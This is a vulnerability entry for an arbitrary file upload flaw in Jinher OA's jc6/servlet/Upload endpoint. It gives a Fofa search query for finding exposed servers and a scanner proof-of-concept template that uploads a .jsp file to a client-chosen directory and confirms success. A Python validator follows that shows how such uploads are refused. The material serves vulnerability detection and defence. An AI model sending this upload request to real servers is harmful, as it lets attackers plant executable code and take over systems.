Vulnerability description
The jc6/servlet/Upload endpoint of Jinher OA (金和OA) has an arbitrary file upload vulnerability.
Fofa: app="金和网络-金和OA"||body="/jc6/platform/sys/login"
id: jinher-jc6-servlet-upload-fileupload

info:
  name: 金和OA jc6/servlet/Upload接口存在任意文件上传漏洞
  author: zan8in
  severity: critical
  verified: true
  description: |-
    金和OA jc6/servlet/Upload接口存在任意文件上传漏洞。
    Fofa: app="金和网络-金和OA"||body="/jc6/platform/sys/login"
  reference:
    - https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247485062&idx=1&sn=e28ca583776a495211c17c3ca4b4fbaa
  tags: jinher,jc6,fileupload
  created: 2024/01/16

set:
  rboundary: randomLowercase(8)
  filename: randomLowercase(6)
  bodystr: randomLowercase(16)
rules:
  r0:
    request:
      method: POST
      path: /jc6/servlet/Upload?officeSaveFlag=0&dbimg=false&path=&setpath=/upload/
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"img\"; filename=\"{{filename}}.jsp\"\r\n\
        Content-Type: image/jpeg\r\n\
        \r\n\
        {{bodystr}}\r\n\
        ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'arr[0]=parent.pubFileName') &&
      response.body.bcontains(b'arr[1]=parent.pubBz') &&
      response.body.bcontains(b"arr[2]='/upload/")
expression: r0()
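As an added defensive example (not part of the template above or of the vendor's code), the following Python shows the server-side checks an upload handler needs so that a request of the shape the template sends is refused: a client-supplied destination directory (setpath), a non-image extension such as .jsp, and file content whose magic bytes do not match the declared image type. The sample request, the extension allowlist and the magic-byte table are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit
# Constructed sample request shaped like the template above (not captured traffic).
BOUNDARY = b"----WebKitFormBoundaryabcdefgh"
SAMPLE_PATH = "/jc6/servlet/Upload?officeSaveFlag=0&dbimg=false&path=&setpath=/upload/"
SAMPLE_BODY = (
    b"--" + BOUNDARY + b"\r\n"
    b'Content-Disposition: form-data; name="img"; filename="qwerty.jsp"\r\n'
    b"Content-Type: image/jpeg\r\n"
    b"\r\n"
    b"abcdefghijklmnop\r\n"
    b"--" + BOUNDARY + b"--\r\n"
)
# Assumed policy: the handler only accepts images; each allowed extension maps to its magic bytes.
MAGIC = {".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff",
         ".png": b"\x89PNG\r\n\x1a\n", ".gif": b"GIF8"}

def parse_parts(body: bytes, boundary: bytes):
    """Split a multipart/form-data body into (headers, content) tuples."""
    parts = []
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):
            break  # closing delimiter reached
        head, _, content = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        headers = {}
        for line in head.decode("latin-1").split("\r\n"):
            k, _, v = line.partition(":")
            headers[k.strip().lower()] = v.strip()
        parts.append((headers, content.rstrip(b"\r\n")))
    return parts

def audit_upload(path_with_query: str, body: bytes, boundary: bytes) -> list[str]:
    """Return the reasons the request must be rejected; an empty list means accept."""
    reasons = []
    if "setpath" in parse_qs(urlsplit(path_with_query).query):
        reasons.append("client supplies destination directory (setpath)")
    for headers, content in parse_parts(body, boundary):
        m = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
        if not m:
            continue  # not a file part
        fname = m.group(1)
        ext = fname[fname.rfind("."):].lower() if "." in fname else ""
        if "/" in fname or "\\" in fname or ".." in fname:
            reasons.append("path characters in filename")
        if ext not in MAGIC:
            reasons.append(f"extension not allowed: {ext or '(none)'}")
        elif not content.startswith(MAGIC[ext]):
            reasons.append("content does not match declared type")
    return reasons
```

The same logic also catches a double-extension upload (x.jsp.jpg carrying non-JPEG bytes), because the magic-byte check runs whenever the extension itself passes the allowlist.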